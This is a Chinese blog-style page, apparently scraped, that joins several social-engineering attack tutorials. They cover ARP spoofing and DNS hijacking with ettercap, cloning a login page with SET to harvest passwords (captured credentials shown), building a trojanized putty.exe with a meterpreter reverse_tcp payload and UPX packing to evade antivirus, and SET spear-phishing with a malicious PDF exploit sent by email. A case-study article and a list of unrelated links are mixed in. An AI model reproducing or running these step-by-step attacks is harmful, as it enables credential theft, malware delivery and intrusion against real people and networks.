精华内容
下载资源
问答
  • 社会工程学攻击案例-网站钓鱼

    千次阅读 2020-05-04 17:43:51
    社会工程学攻击案例-网站钓鱼 渗透攻击原理 攻击机与其他主机在同一局域网内,通过 ARP 欺骗使其他主机的流量都经过攻击机,有选择性的抓取数据包,例如攻击者想要窃取用户登录百度网站的信息,采取克隆站点的方式...

    社会工程学攻击案例-网站钓鱼

    渗透攻击原理

    在这里插入图片描述
    攻击机与其他主机在同一局域网内,通过 ARP 欺骗使其他主机的流量都经过攻击机,有选择性的抓取数据包,例如攻击者想要窃取用户登录百度网站的信息,采取克隆站点的方式,来强制引导用户主机的流量。 该攻击方式需要执行以下三个步骤:
    1、ARP 欺骗
    2、域名劫持
    3、网站克隆

    BT5实现

    1、启动社会工程学攻击集

    root@bt:~# cd /pentest/exploits/set
    root@bt:/pentest/exploits/set# ./set
    

    2、选择网页攻击

    1) Spear-Phishing Attack Vectors
    2) Website Attack Vectors
    3) Infectious Media Generator
    4) Create a Payload and Listener
    5) Mass Mailer Attack
    6) Arduino-Based Attack Vector
    7) SMS Spoofing Attack Vector
    8) Wireless Access Point Attack Vector
    9) Third Party Modules
    10) Update the Metasploit Framework
    11) Update the Social-Engineer Toolkit
    12) Help, Credits, and About
    99) Exit the Social-Enginee r Toolkit
    Select from the menu:
    set>2
    

    3、选择账号窃取

    1) Java Applet Attack Method
    2) Metasploit Browser Exploit Method
    3) Credential Harvester Attack Method
    4) Tabnabbing Attack Method
    5) Man Left in the Middle Attack Method
    6) Web Jacking Attack Method
    7) Multi-Attack Web Method
    8) Create or im port a CodeSigning Certificate
    99) Return to Main Menu
    set: webattack > 3 
    

    4、选择克隆站点

    1) Web Templates
    2) Site Cloner
    3) Custom Import
    99) Return to Webattack Menu
    set:webattack > 2
    

    5、开始克隆

    set:webattack > Enter the url to clone: http://10.10.10.129/signin.html
    Press {return} to continue.
    

    6、靶机测试
    之后再靶机上用浏览器输入 http://10.10.10.131,并填写登陆用户名和密码

    7、账号获取

    [*] WE GOT A HIT! Printing the output:
    POSSIBLE USERNAME FIELD FOUND: username=admin
    POSSIBLE PASSWORD FIELD FOUND: password=dvssc@admin01
    POSSIBLE USERNAME FIELD FOUND: Login=Login
    

    Kali Linux实现

    一、域名劫持(域名欺骗)ettercap

    1、启动 ettercap

    ettercap -G
    

    2、主机扫描
    在这里插入图片描述
    3、ARP欺骗
    在这里插入图片描述
    此时去靶机 ARP 表查看是否毒化。

    4、流址抓包
    在这里插入图片描述
    5、DNS欺骗
    编辑 DNS 劫持内容

    vim /etc/ettercap/etter.dns
    
    home.51cto.com  A  10.1.1.10
    //将这个域名劫持到本地 IP,若是*.51cto.com,则是将51cto.com为后缀的都映射到本地攻击者的IP,然后攻击机将登陆的克隆页面放回给靶机
    

    在这里插入图片描述
    开启 DNS 欺骗泛洪
    在这里插入图片描述
    双击此模块则开启,再双击则关闭
    在这里插入图片描述
    PC 上测试 DNS 欺骗
    在这里插入图片描述

    二、网站克隆

    1、启动 SET(路径与 BT5 不同)

    cd /usr/share/set
    ./setookit
    

    在这里插入图片描述
    2、选项1,社会工程学攻击
    在这里插入图片描述
    3、选项2,网页欺骗攻击
    在这里插入图片描述
    4、选观3,网页克隆攻击
    在这里插入图片描述
    5、选项2,单个站点克隆
    在这里插入图片描述
    6、输入攻击机的 IP 地址
    在这里插入图片描述
    7、输入克隆的网页地址
    在这里插入图片描述
    8、开始克隆网页(开启 apache)
    若 Apache 服务默认没有开,这里会提示是否开始,选择y;
    肉鸡访问本地IP地址,则访问的是一个虚假的 home.51cto.com,当肉鸡往这个页面填写如用户名和密码的时候,则可以被我们发现。
    在这里插入图片描述

    三、在靶机上测试效果

    1、靶机能够 ping 通攻击者的 IP 地址
    在这里插入图片描述
    2、靶机浏览器输入攻击者的 IP 地址
    在这里插入图片描述
    3、靶机上输入用户名和密码
    在这里插入图片描述
    4、点击登陆之后会进入真实的网页
    这个是真实页面,但是刚才点击登陆的时候,密码已经被截获
    在这里插入图片描述
    5、打开攻击者缓存文件查看用户密码
    在这里插入图片描述
    在这里插入图片描述

    真实环境实现(Kali 桥接)

    VMware模式:桥接模式/NAT模式

    修改 IP 和路由(一次性)

    ifconfig eth0 192.168.199.87  netmask 255.255.255.0 up 
    //设置IP地址
    route add default gw 192.168.199.1
    //添加默认路由
    

    修改 IP 和路由(永久性)

    vim /etc/network/interfaces
    
    
    auto eth0
    allow-hotplug eth0
    iface eth0 inet static
    address 10.1.1.212
    netmask 255.255.255.0
    gateway 10.1.1.254
    

    为了使被攻击机被欺骗后仍可正常上网,需要添加路由转发功能

    root@PL-kali:# vim /etc/sysctl.conf 
    
    
    # Uncomment the next line to enable packet forwarding for IPv4
    net.ipv4.ip_forward=1  //将前面的注释#删掉,并重启机器reboot
    

    修改DNS服务器

    root@PL-kali:~# vim /etc/resolv.conf
    
    
    nameserver 223.5.5.5
    

    剩余操作和虚拟环境下相同。

    展开全文
  • 社会工程学攻击案例-伪装木马 msfpayload 做后门程序 root@bt:~# mkdir /root/example_01 //生成目录,名称为example_01 //将putty软件拷贝到此目录下(可以在gns3安装目录下找到或者到网上下载,注意要英文版) ...

    社会工程学攻击案例-伪装木马

    msfpayload 做后门程序

    root@bt:~# mkdir /root/example_01
    //生成目录,名称为example_01
    //将putty软件拷贝到此目录下(可以在gns3安装目录下找到或者到网上下载,注意要英文版)
    root@bt:~# cd /root/example_01/   //进入此文件夹
    root@bt:~/example_01# msfpayload windows/meterpreter/reverse_tcp LHOST=10.10.10.131 LPORT=80 R | msfencode -t exe -x /root/example_01/putty.exe -k -o putty_backdoor.exe -e x86/shikata_ga_nai -c 5
    //生成后门程序,并将后门捆绑到putty软件(其他软件也通用)
    //管道符,将前面做好的指令传递给后面指令
    root@bt:~/example_01# ll    //查看本目录下增加的带有后门的putty程序
    

    将目录下的 putty_backdoor.exe 拷贝到靶机。

    启动监听程序。

    root@bt:/pentest/exploits/framework2# /opt/framework/msf3/msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=10.10.10.131 LPORT=80 E
    
    msf > use exploit/multi/handler
    msf  exploit(handler) > set payload windows/meterpreter/reverse_tcp
    msf  exploit(handler) > set LHOST 10.10.10.131
    msf  exploit(handler) > set LPORT 80
    msf  exploit(handler) > exploit
    

    在靶机上安装杀毒软件,发现部分杀毒软件可以识别后台木马。通过 UPX 来实现加强免杀。

    root@bt:~/example_01# upx -6 -o putty_backdoor_upx6.exe putty_backdoor.exe
    

    将 putty_backdoor_upx6 软件放在靶机上,再次测试杀毒。

    展开全文
  • 社会工程学攻击案例-邮件钓鱼

    千次阅读 2020-05-04 22:11:28
    社会工程学攻击案例-邮件钓鱼 BT5实现 root@bt:~# cd /pentest/exploits/set root@bt:/pentest/exploits/set# ./set Select from the menu: 1) Spear-Phishing Attack Vectors 2) Website Attack Vectors 3) ...

    社会工程学攻击案例-邮件钓鱼

    BT5实现

    root@bt:~# cd /pentest/exploits/set
    root@bt:/pentest/exploits/set# ./set
    
    Select from the menu:
    1) Spear-Phishing Attack Vectors
    2) Website Attack Vectors
    3) Infectious Media Generator
    4) Create a Payload and ustener
    5) Mass Mailer Attack
    6) Arduino Based Atack vector
    7) SMS Spoofing Attack Vector
    8) Wireless Access Point Attack Vector
    9) Third party Modules
    10) update the Metasploit Framework
    11) Update the soclal Engneer Tookut
    12) Help, Credits, and About
    99) Exit the Socal Engineer Toolkit
    set > 1
    
    1) Perform a Mass Email Attack
    2) Create a FileFormat Payload
    3) Create a Social-Engineering Template
    99) Return to Main Menu
    set:phishing > 1
    
    1) SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)
    2) SET Custom Written Document UNC LM SMB Capture Attack
    3) Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow
    4) Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)
    5) Adobe Flash Player "Button" Remote Code Execution
    6) Adobe CoolType SING Table "uniqueName" Overflow
    7) Adobe Flash Player "newfunction" Invalid Pointer Use
    8) Adobe Collab. collectEmailInfo Buffer Overflow
    9) Adobe Collab.getIcon Buffer Overflow
    10) Adobe JBIG2Decode Memory Corruption Exploit
    11) Adobe PDF Embedded EXE Social Engineering
    12) Adobe util.printf() Buffer Overflow
    13) Custom EXE to VBA (sent via RAR) (RAR required)
    14) Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
    15) Adobe PDF Embedded EXE Social Engineering (NOJS)
    16) Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow
    17) Nuance PDF Reader v6.0 Launch Stack Buffer Overflow
    set:payloads > 6
    
    1) Windows Reverse TCP Shell
    //Spawn a command shell on victim and send back to attacker
    2) Windows Meterpreter Reverse_ _TCP
    //Spawn a meterpreter shell on victim and send back to attacker
    3) Windows Reverse VNC DLL
    //Spawn a VNC server on victim and send back to attacker
    4) Windows Reverse TCP Shell (x64)
    //Windows X64 Command Shell, Reverse TCP Inline
    5) Windows Meterpreter Reverse_ TCP (X64) 
    //Connect back to the attacker (Windows x64), Meterpreter
    6) Windows Shell Bind_ TCP (X64)
    //Execute payload and create an accepting port on remote system
    7) Windows Meterpreter Reverse HTTPS
    //Tunnel communication over HTTP using SSL and use Meterpreter
    set:payloads > 2
    
    set:payloads > Port to connect back on [443]:
    ENTER
    
    [-] Defaulting to port 443...
    [-] Gene rating fileformat exploit...
    [*] Payload creation complete.
    [*] All payloads get sent to the src/ program_ junk/src/ program_ junk/template .pdf directory
    [-] As an added bonus, use the file-format creator in SET to create your attachment.
    Right now the attachment will be imported with filename of 'template.whatever'
    Do you want to rename the file?
    example Enter the new filename: moo.pdf
    1.Keep the filename, I don't care.
    2.Rename the file, I want to be cool.
    set:phishing > 2
    set:phishing > New filename: TEST.PDF
    
    What do you want to do:
    1. E-Mail Attack Single Email Address
    2. E-Mail Attack Mass Mailer
    3. Return to main menu.
    set:phishing > 1
    
    Do you want to use a predefined template or craft
    a one time email template.
    1. Pre-Defined Template
    2. One-Time Use Email Template
    set:phishing > 2
    set:phishing > Subject of the email: ABC PROJECT STATUS
    set:phishing > Send the message as html or plain? 'h' or'p' [p]: p
    set:phishing > Enter the body of the message, hit return for a new line. Control +C when finished:
    Next line of the body: Hi Wang
    Next line of the body: Please review the ABC project status report.
    Next line of the body: Best Reguard!
    Next line of the body: Li ming
    Next line of the body: ^C
    set:phishing > Send email to: 30330XXXX@qq.com
    1. Use a gmail Account for your email attack.
    2. Use your own server or open relay
    set:phishing > 2
    set: phishing > From address (ex: moo@example. com ): kejiXXX@163.com
    set: phishing > Username for open-relay [blank]: kejiXXX
    Password for open- relay [blank]:
    set:phishing > SMTP email server address (ex.smtp.youremailserveryouown.com): smtp.163.com
    set: phishing > Port number for the SMTP server [25]:
    set:phishing > Flag this message/s as high priority? [yes |no]:yes
    [*] SET has finished delivering the emails
    set:phishing > Setup a listener [yes|no]:yes
    
    resource (src/program_ junk/meta_ config)> use exploit/multi/handler
    resource (src/program_ junk/meta_ config)> set PAYLOAD windows/meterpreter/reverse_ tcp
    PAYLOAD => windows/ meterpreter/reverse_ tcp
    resource (src/program_ junk/meta_ config)> set LHOST 10.10.10.131
    LHOST => 10.10.10.131
    resource (src/program_ junk/meta_ config)> set LPORT 443
    LPORT => 443
    resource (src/program_ junk/meta_ config)> set ENCODING shikata_ ga_ nai
    ENCODING => shikata_ _ga_ nai
    resource (src/ program_ junk/meta_ config)> set ExitOnSession false
    ExitOnSession => false
    resource (src/ program_ junk/meta_ config)> exploit j
    [*] Explolt running as background job.
    msf exploit(handler) >
    [*] Started reverse handler on 10.10.10.131:443
    [*] Starting the payload hander...
    
    展开全文
  • 社会工程学攻击的三个典例

    万次阅读 2019-06-05 19:48:59
    Hadnagy是社会工程学攻击网站social-engineering.org的创办人之一,并且著有《社会工程学:人力黑客艺术》一书,十多年来他一直在使用操纵策略,向客户表明犯罪分子在如何窃取信息。 Hadnagy在其新书中大致介绍了三...

    在这里插入图片描述
    Chris Hadnagy是靠”骗人”来领薪水的;这么多年来,他练就了一套炉火纯青的骗人功夫。Hadnagy是社会工程学攻击网站social-engineering.org的创办人之一,并且著有《社会工程学:人力黑客艺术》一书,十多年来他一直在使用操纵策略,向客户表明犯罪分子在如何窃取信息。

    Hadnagy在其新书中大致介绍了三种典型的社会工程学攻击测试,并指出了企业可以从这些结果中汲取到什么教训。

    过于自信的CEO

    在一个案例研究中,Hadnagy概述了自己如何受雇于一家印刷公司,担任社会工程学攻击审查员,其任务就是设法闯入该公司的服务器;这家公司有一些专利工艺和供应商名单是竞争对手挖空心思想弄到的。该公司的首席执行官(CEO)与Hadnagy的业务合作伙伴进行了一番电话会议,告诉Hadnagy”想闯入他公司几乎是不可能的”,因为他”拿自己的性命来看管秘密资料。”

    Hadnagy说:”他属于从来不会轻易上当的那种人。他想着有人可能会打来电话,套取他的密码,他随时准备对付这样的花招。”

    Hadnagy收集了一些信息后,找到了服务器的位置、IP地址、电子邮件地址、电话号码、物理地址、邮件服务器、员工姓名和职衔以及更多的信息。但是Hadnagy设法了解了这位CEO有个家人与癌症作斗争,并活了下来之后,才真正得到了回报。因而,Hadnagy开始关注癌症方面的募捐和研究,并积极投入其中。他通过Facebook,还获得了关于这位CEO的其他个人资料,比如他最喜爱的餐厅和球队。

    他掌握了这手资料后,准备伺机下手。他打电话给这位CEO,冒充是他之前打过交道的一家癌症慈善机构的募捐人员。他告诉对方慈善机构在搞抽奖活动,感谢好心人的捐赠–奖品除了几家餐厅(包括他最喜欢的那家餐厅)的礼券外,还包括由他最喜欢的球队参加的比赛的门票。

    那位CEO中招了,同意让Hadnagy给他发来一份关于募捐活动更多信息的PDF文档。他甚至设法说服这位CEO,告诉他的电脑上使用哪个版本的Adobe阅读器,因为他告诉对方”我要确保发过来的PDF文档是你那边能打开的。”他发送PDF文档后没多久,那位CEO就打开了文档,无形中安装了一个外壳程序,让Hadnagy得以闯入他的电脑。

    Hadnagy说,当他和合作伙伴回头告诉这家公司:他们成功闯入了CEO的电脑后,那位CEO很愤怒,这自然可以理解。

    Hadnagy说:”他觉得,我们使用这样的手法是不公道的;但不法分子就是这么干的。不怀好意的黑客会毫不犹豫地利用这些信息来攻击他。”

    第一个教训:对于竭力搞破坏的社会工程学攻击者来说,没有什么信息是访问不了的,不管这是涉及个人的信息,还是让对方易动感情的信息。

    第二个教训:自认为最安全的人恰恰常常会带来最大的安全漏洞。一名安全顾问最近告诉我们,公司主管是最容易被社会工程学攻击者盯上的目标。

    主题乐园丑闻

    这第二个案例研究中的对象是一个担心票务系统可能被人闯入的主题乐园客户。用来游客签到的计算机还可以连接到服务器、客户信息和财务记录。客户担心:如果用来签到的计算机被闯入,可能会发生严重的数据泄密事件。

    Hadnagy开始了他的测试,先打电话给这家主题乐园,冒充是一名软件销售员。他推销的是一种新的PDF阅读软件,希望这家主题乐园通过免费试用版来试用一下。他询问对方目前在使用哪个版本的阅读软件,轻而易举就获得了信息,于是准备着手第二步。

    下一个阶段需要到现场进行社会工程学攻击,为了确保能够得手,Hadnagy拉上了其家人。他带着妻子和儿子直奔其中一个售票窗口,问其中一名员工是不是可以用他们的计算机打开他的电子邮件收到的一个文件。电子邮件含有一篇PDF附件,里面的优惠券可以在买门票时享受折扣。

    Hadnagy解释:”要是她说’不行,对不起,不可以这么做’,那我的整个计划就泡汤了。但是看我那个样子,孩子又急于入园,对方就相信了我。”

    那名员工同意了,主题乐园的计算机系统很快被Hadnagy的恶意PDF文档闯入了。短短几分钟内,Hadnagy的合作伙伴发来了短信,告诉他已”进入系统”,并且”在收集报告所需的信息。”

    Hadnagy还指出,虽然主题乐园的员工政策明确规定:员工不得打开来源不明的附件(哪怕客户需要帮助也不行),但是没有落实规章制度来切实执行员工政策。

    Hadnagy说:”人们愿意不遗余力地帮助别人解决问题。”

    第三个教训:安全政策的效果完全取决于实际执行情况。

    第四个教训:犯罪分子往往抓住员工乐于助人的善意和愿望来搞破坏。

    黑客反遭攻击

    Hadnagy给出的第三个例子表明了可以如何运用社会工程学攻击来用于防御。他在书中虚构了一个名叫”John”的人物,这名渗透测试人员受雇为一家客户从事标准的网络渗透测试。他使用开源的安全漏洞检测工具Metasploit进行了扫描,结果发现了一台敞开的VNC(虚拟网络计算)服务器,这台服务器允许控制网络上的其他机器。

    他在VNC会话开启的情况下记录发现的结果,这时候鼠标在后台突然开始在屏幕上移动。John意识到这是个危险信号,因为在出现这个异常情况的那个时间段,谁也不会以正当的理由连接至网络。他怀疑有人入侵进入到了网络上。

    John决定冒一下险,于是打开记事本,开始与入侵者聊天,冒充自己是化名为”n00b”的黑客,佯称自己是个新手,缺乏黑客技能。

    Hadnagy说:”John想’我怎样才能从这个家伙身上收集到更多的信息,为我的客户提供更大的帮助?’John尽量装成自己是个菜鸟,想从黑客高手那里取取经,因而满足了对方的虚荣心。”

    John向这个黑客问了几个问题,装作自己是刚入道的年轻人,想了解黑客行业的一些手法,想与另一名黑客保持联系。等到聊天结束后,他已弄来了这个入侵者的电子邮件和联系信息,甚至还弄来了对方的照片。他回头把这些信息汇报给了客户,系统容易被闯入的问题随之得到了解决。

    Hadnagy另外指出,John通过与黑客进行一番聊天后还得知:对方其实不是之前一直”盯着”他所闯入的这家公司,而是四处寻找容易闯入的系统,没想到轻而易举地发现了那个敞开的系统。

    第五个教训:社会工程学攻击可以成为一家企业的防御战略的一部分。

    第六个教训:犯罪分子通常会选择容易中招的目标下手。要是安全性很差,谁都可能会成为目标。

    展开全文
  • 社会工程学实例集合

    2011-12-16 11:04:03
    社会工程学实例集合,有很多经典的入侵前的社会工程学案例,无论是网管,还是黑客,都有必要好好学学,知己知彼,百战不殆
  • 所以,将社会工程学攻击实例化将是一个不错的选择,议题从多个国内外的实际攻击案例,来分析和制作基本的社会工程学攻击实例模型。试图使每一个安全从业人员能够轻松套用攻击测试的流程实例,针对企业组织进行有效...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 2,929
精华内容 1,171
关键字:

社会工程学攻击案例